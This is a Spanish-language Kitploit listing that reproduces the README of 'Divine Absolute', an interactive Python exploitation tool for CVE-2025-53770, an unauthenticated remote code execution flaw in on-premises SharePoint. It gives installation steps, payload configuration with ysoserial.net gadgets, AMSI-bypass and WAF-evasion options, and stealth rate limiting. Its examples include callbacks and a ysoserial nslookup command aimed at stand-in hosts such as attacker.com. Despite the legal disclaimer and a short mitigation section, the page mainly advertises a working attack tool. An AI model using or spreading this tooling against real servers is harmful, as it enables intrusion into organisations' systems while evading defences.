Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-53770 — Una herramienta de explotación en Python sofisticada y guiada por asistentes dirigida a CVE-2025-53770, una vulnerabilidad crítica (CVSS 9.8) de ejecución remota de código (RCE) no autenticada en Microsoft SharePoint Server local (2016, 2019, Subscription Edition) | Kitploit
Herramientas/GitHubGitHub/exfil0/cve-2025-53770
Escalada de PrivilegiosReconocimientoGeneración de PayloadsAnálisis de VulnerabilidadesExplotaciónEvasión de IDS/IPSExplotación de Aplicaciones WebPost-ExplotaciónPruebas de PenetraciónComando y Control
GitHubexfil0/cve-2025-53770
512hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-53770

Una herramienta de explotación en Python sofisticada y guiada por asistentes dirigida a CVE-2025-53770, una vulnerabilidad crítica (CVSS 9.8) de ejecución remota de código (RCE) no autenticada en Microsoft SharePoint Server local (2016, 2019, Subscription Edition)

Ver Repositorio

Divine Absolute - Herramienta de Explotación CVE-2025-53770

License
Python

Resumen

Divine Absolute es una herramienta de explotación Python sofisticada y guiada por un asistente que apunta a CVE-2025-53770, una vulnerabilidad crítica (CVSS 9.8) de ejecución remota de código (RCE) no autenticada en Microsoft SharePoint Server local (2016, 2019, Subscription Edition). Esta vulnerabilidad, revelada como día cero el 19 de julio de 2025, proviene de la deserialización de datos no confiables en /_layouts/15/ToolPane.aspx. La herramienta está diseñada solo para pruebas de penetración éticas e investigación de seguridad autorizada, ofreciendo precisión, sigilo y adaptabilidad inigualables para reconocimiento, explotación y verificación.

Repositorio: https://github.com/exfil0/CVE-2025-53770

⚠️ Advertencia Legal: Esta herramienta es solo para uso legal y autorizado en entornos controlados con permiso explícito. El uso no autorizado contra sistemas que no posees o para los que no tienes permiso de prueba es ilegal y puede resultar en graves consecuencias legales. El autor no asume ninguna responsabilidad por uso indebido.

Características

  • Modos:
    • Recon: Detecta presencia de SharePoint, versión y accesibilidad de ToolPane.aspx con puntuación avanzada y expresiones regulares (ej., 16.0.0.\d+-\w+?).
    • Exploit: Entrega payloads a través de ToolPane.aspx con robustas evasiones.
    • Full: Combina reconocimiento y explotación, con opción de explotación agresiva.
  • Generación de Payloads:
    • Integra ysoserial.net para payloads de deserialización .NET (ej., ObjectDataProvider, LosFormatter).
    • Opcional pythonnet para payloads de pingback HTTP/DNS de respaldo (ej., WebRequest.Create, Dns.GetHostEntry).
    • Soporta compresión GZIP con codificación/descodificación explícita y validación base64.
    • Inyecta evasiones AMSI (reflexión básica, ofuscada o fragmentos personalizados) en comandos PowerShell, incluidos payloads codificados en base64 (-enc).
  • Evasiones:
    • Evasión de URI: Sufijos aleatorios o fijos (ej., /xp.aspx, basados en UUID).
    • Suplantación de Referer: Ninguno, dominios externos (ej., www.google.com), URLs personalizadas, o rutas internas de SharePoint (ej., /_layouts/15/sharepoint.aspx).

Contexto de CVE-2025-53770

  • Vulnerabilidad: RCE no autenticada mediante deserialización en /_layouts/15/ToolPane.aspx.
  • Afectados: SharePoint Server 2016, 2019, Subscription Edition (EOL 2010/2013 también vulnerables).
  • No afectados: SharePoint Online (M365).
  • Explotado: Desde el 18 de julio de 2025, en campañas como "ToolShell" por actores patrocinados por estados (ej., Linen Typhoon).
  • Parches: Los parches de Microsoft (ej., KB5002768, KB5002754) publicados el 19 de julio de 2025 mitigan completamente. La inclusión en CISA KEV exige parcheo federal antes del 21 de julio de 2025.
  • Mitigaciones: Parchear, rotar claves después del parche, habilitar AMSI/Defender (Modo Completo), monitorizar POSTs a /ToolPane.aspx, usar reglas WAF (ej., Cloudflare).

Instalación

Prerrequisitos

  • Python 3.8+
  • Dependencias:
    root@kitploit:~
    pip install requests termcolor
    
  • Opcional (para respaldo de serialización .NET):
    root@kitploit:~
    pip install pythonnet
    
  • ysoserial.net:
    • Descargar desde ysoserial.net releases.
    • Colocar ysoserial.exe en una ruta conocida (ej., ./ysoserial.exe).
  • Mono/Wine (sistemas no Windows):
    root@kitploit:~
    # Ubuntu/Debian
    sudo apt-get install mono-complete
    # macOS (via Homebrew)
    brew install mono
    
  • Laboratorio Docker (recomendado para pruebas):
    root@kitploit:~
    docker pull mcr.microsoft.com/sharepoint/server:2019
    

Configuración

  1. Clonar el repositorio:
    root@kitploit:~
    git clone https://github.com/exfil0/CVE-2025-53770.git
    cd CVE-2025-53770
    
  2. Instalar dependencias de Python:
    root@kitploit:~
    pip install -r requirements.txt
    
  3. Asegurar que ysoserial.exe sea accesible o proporcionar su ruta durante la ejecución.
  4. (Opcional) Verificar Mono/Wine para sistemas no Windows.

Uso

Ejecutar el asistente interactivo:

root@kitploit:~
python divine_absolute.py

Flujo de trabajo

  1. Selección de Modo:
    • Recon: Escanea en busca de presencia y versión de SharePoint.
    • Exploit: Envía payload a ToolPane.aspx.
    • Full: Reconocimiento + explotación (modo agresivo opcional).
  2. Entrada de Objetivo:
    • URL única (ej., https://sharepoint.example.com).
    • Archivo con URLs (una por línea).
  3. Configuración del Payload:
    • ysoserial.net: Especificar ruta, gadget (ej., ObjectDataProvider) y comando (ej., cmd /c whoami).
    • File: Cargar payload base64 GZIP desde archivo.
    • String: Ingresar payload base64 GZIP directamente.
    • Pingback: Generar pingback HTTP/DNS (ej., http://attacker.com/callback o sub.attacker.com).
    • Evasión AMSI: Elegir NONE, BASIC_REFLECTION, o fragmento personalizado.

Ejemplos de Comandos

  • Reconocimiento:
    root@kitploit:~
    python divine_absolute.py
    # Seleccionar: Mode=Recon, Target=https://sharepoint.example.com
    
  • Explotación con ysoserial.net:
    root@kitploit:~
    python divine_absolute.py
    # Seleccionar: Mode=Exploit, Target=https://sharepoint.example.com, Payload=YSOSERIAL,
    #         ysoserial.exe path=./ysoserial.exe, Gadget=ObjectDataProvider,
    #         Command="cmd /c echo %COMPUTERNAME% > C:\Temp\out.txt"
    
  • Modo Completo con Verificación:
    root@kitploit:~
    python divine_absolute.py
    # Seleccionar: Mode=Full, Target=target_list.txt, Payload=FILE, Payload File=payload.b64,
    #         Verify Path=/sitepages/out.txt, Regexes="COMPUTERNAME", Status Codes=200
    
  • Pingback DNS:
    root@kitploit:~
    python divine_absolute.py
    # Seleccionar: Mode=Exploit, Payload=PINGBACK, Pingback URL=sub.attacker.com
    

Salida

Los resultados se guardan en xanthorox_results.json con los campos:

  • target: URL probada.
  • sharepoint_detected: Booleano.
  • toolpane_accessible: Booleano.
  • exploited: Booleano (payload enviado).
  • verified_rce: Booleano/None (RCE confirmado).
  • error: Cualquier error encontrado.

Ejemplo:

root@kitploit:~
[
  {
    "target": "https://sharepoint.example.com",
    "sharepoint_detected": true,
    "toolpane_accessible": true,
    "exploited": true,
    "verified_rce": true,
    "error": null
  }
]

Mejoras Abordadas

Esta versión corrige:

  • Límite de Velocidad Adaptativo: Ignora errores no reintentables (ej., 404) para contadores de éxito/error; impone un mínimo de RPS (0.01).
  • Inyección AMSI: Descodifica e inyecta evasiones en comandos PowerShell codificados en base64 (-enc); soporta no PowerShell (ej., cmd.exe) con advertencias.
  • Respaldo de Pingback: Usa pythonnet para pingback DNS fiable con Dns.GetHostEntry (experimental, requiere gadget para efecto completo).

Recomendaciones de Prueba

  • Configuración de Laboratorio: Usar un contenedor Docker de SharePoint Server 2019 (sin parchear) para pruebas seguras.
  • Pruebas WAF: Validar evasiones contra Cloudflare o WAF similares con RPS adaptativo.
  • Pruebas de Payload: Generar payloads con ysoserial.exe -f LosFormatter -g ObjectDataProvider -c "cmd /c nslookup sub.attacker.com" -o base64 y verificar registros DNS.

Limitaciones Conocidas

  • Fiabilidad del Pingback: Dns.GetHostEntry en pythonnet puede no activarse sin una cadena de gadget específica.
  • Comandos Complejos: Los comandos PowerShell no estándar pueden requerir inyección manual de evasión AMSI.
  • Detección WAF: Algunos WAF pueden bloquear payloads a pesar de las evasiones; probar a fondo.

Contribuciones

¡Las contribuciones son bienvenidas! Por favor:

  1. Haz un fork del repositorio.
  2. Crea una rama de características (git checkout -b feature/awesome-improvement).
  3. Confirma los cambios (git commit -m "Add awesome improvement").
  4. Sube a la rama (git push origin feature/awesome-improvement).
  5. Abre un pull request.

Licencia

Este proyecto está licenciado bajo la Licencia MIT. Consulta LICENSE para más detalles.

Agradecimientos

  • xAI: Por inspirar investigación de seguridad de vanguardia.
  • Equipo de ysoserial.net: Por el generador de payloads de deserialización .NET.
  • Comunidad de Seguridad: Por los conocimientos sobre explotación y mitigaciones de CVE-2025-53770.

Contacto

  • Autor: @exfil0
  • Issues: GitHub Issues
  • Telegram: https://t.me/GOTOCVE

Nota: Siempre verifica los payloads y configuraciones en un laboratorio controlado antes de usarlos. Mantente ético, mantente legal.

Descargar herramienta
  • Sigilo:
    • Límite de velocidad adaptativo con un mínimo de RPS (0.01) y control de ráfagas.
    • Concurrencia segura para hilos con ritmo protegido por bloqueo y jitter (0-0.1s).
  • Verificación:
    • Confirmación robusta de RCE con expresiones regulares compiladas OR, reintentos en RequestException y códigos de estado/rutas personalizables.
  • Reconocimiento:
    • Detección mejorada de SharePoint mediante cabeceras (ej., MicrosoftSharePointTeamServices), rutas (ej., /versions.aspx) y expresiones regulares.
  • Salida:
    • Resultados JSON con registro forense para análisis.
  • Usabilidad:
    • Asistente interactivo para configuración fácil.
    • Soporta Mono/Wine para ysoserial.net en sistemas no Windows.
    • Soporte de proxy (HTTP/SOCKS5) y timeouts personalizables.
  • CONCAT_OBFUSCATED
  • Opciones de Evasión:
    • URI: NONE, FIXED (ej., /xp.aspx), RANDOM (basado en UUID).
    • Referer: DEFAULT_SP, NO_REFERER, RANDOM_EXTERNAL, CUSTOM_URL.
  • Configuración de Red:
    • Proxy (ej., http://127.0.0.1:8080).
    • Hilos, timeout, jitter y límite de velocidad (RPS).
  • Verificación de RCE:
    • Especificar ruta (ej., /sitepages/result.txt), expresiones regulares (ej., Xanthorox.*), códigos de estado (ej., 200,403), intentos, retardo y timeout.